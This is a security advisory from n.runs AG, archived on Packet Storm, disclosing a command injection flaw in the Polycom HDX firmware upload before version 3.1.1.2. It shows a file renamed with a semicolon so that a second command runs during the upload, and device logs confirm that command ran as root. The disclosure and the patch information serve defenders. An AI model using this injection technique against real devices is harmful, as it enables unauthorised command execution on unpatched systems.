what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Polycom Firmware Update Command Injection

Polycom Firmware Update Command Injection
Posted Mar 15, 2013
Authored by Moritz Jodeit | Site nruns.com

The firmware update functionality in the Polycom web interface is vulnerable to a simple command injection vulnerability which allows an attacker with access to the web interface to execute arbitrary commands on the underlying embedded Linux system. Polycom HDX series versions prior to 3.1.1.2 are affected.

tags | exploit, web, arbitrary
systems | linux
SHA-256 | eaeed66e6e35211d5de8494085612d6cabc696df21d84244931e4cb825cb4492

Polycom Firmware Update Command Injection

Change Mirror Download
n.runs AG
http://www.nruns.com/
security(at)nruns.com
n.runs-SA-2013.002
15-Mar-2013
___________________________________________________________________________
Vendor: Polycom, http://www.polycom.com
Affected Products: Polycom HDX Series
Affected Version: < 3.1.1.2
Vulnerability: Polycom Firmware Update Command Injection
Risk: MEDIUM
___________________________________________________________________________

Overview:

Polycom HDX systems can be upgraded via Polycom Update Files (PUP files).
The upgrade functionality is available in the Polycom administrative web
interface.

Description:

The firmware update functionality in the Polycom web interface is
vulnerable to a simple command injection vulnerability which allows an
attacker with access to the web interface to execute arbitrary commands
on the underlying embedded Linux system.

When uploading a PUP file via the web interface the file is first stored
on the device and then the filename is passed as an argument to a call
to the "puputils.ppc" binary in order to verify its integrity. Missing
input validation allows an attacker to inject additional shell commands
by using shell metacharacters (such as a semicolon). In order to mount the
attack a valid PUP file can be renamed as follows:

$ mv polycom-hdx-release-3.0.5-22695.pup 'test;logger PWNED;bla.pup'

When this file is uploaded through the web interface the injected command
"logger PWNED" is executed on the system. This can also be observed in
the logs:

2012-09-02 20:17:01 INFO unknown: puputils.ppc: pc[0]: Welcome to the PUP
Utilities.
2012-09-02 20:17:01 INFO unknown: puputils.ppc: pc[0]: Verifying the
integrity of the PUP file "../web2/docroot/data/test"
2012-09-02 20:17:01 ERROR unknown: puputils.ppc: pc[0]: Unable to open file
"../web2/docroot/data/test".
2012-09-02 20:17:01 ERROR unknown: puputils.ppc: pc[0]: CalculateFileSHA1 on
pup file failed
2012-09-02 20:17:01 ERROR unknown: puputils.ppc: pc[0]: Unable to open file
"../web2/docroot/data/test".
2012-09-02 20:17:01 INFO unknown: puputils.ppc: pc[0]: returning
PUP_ERR_FILE_CANT_ACCESS
2012-09-02 20:17:01 INFO root: pwned
2012-09-02 20:17:01 INFO jvm: pc[0]: system_pthread: ./puputils.ppc verify
../web2/docroot/data/test;logger pwned;bla.pup [32512]
2012-09-02 20:17:01 ERROR jvm: pc[0]: softupdate: command "./puputils.ppc
verify ../web2/docroot/data/test;logger pwned;bla.pup" returned unexpected
error 127.

Impact:

Someone with access to the Polycom administrative web interface can
execute arbitrary commands on the underlying embedded Linux system.
In combination with some other vulnerability such as a Cross-Site
Request Forgery vulnerability this attack could potentially be
performed even without direct access to the web interface. However
we didn't verify that yet.

Solution:

Polycom released version 3.1.1.2 of the HDX software which fixes this
issue. It can be downloaded from the Polycom Support page at
http://support.polycom.com.
___________________________________________________________________________

Credit:
Bug found by Moritz Jodeit of n.runs AG.
___________________________________________________________________________

Unaltered electronic reproduction of this advisory is permitted. For all
other reproduction or publication, in printing or otherwise, contact
security@nruns.com for permission. Use of the advisory constitutes
acceptance for use in an "as is" condition. All warranties are excluded.
In no event shall n.runs be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or
special damages, even if n.runs has been advised of the possibility of
such damages.

Copyright 2013 n.runs AG. All rights reserved. Terms of use apply.
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    0 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    0 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close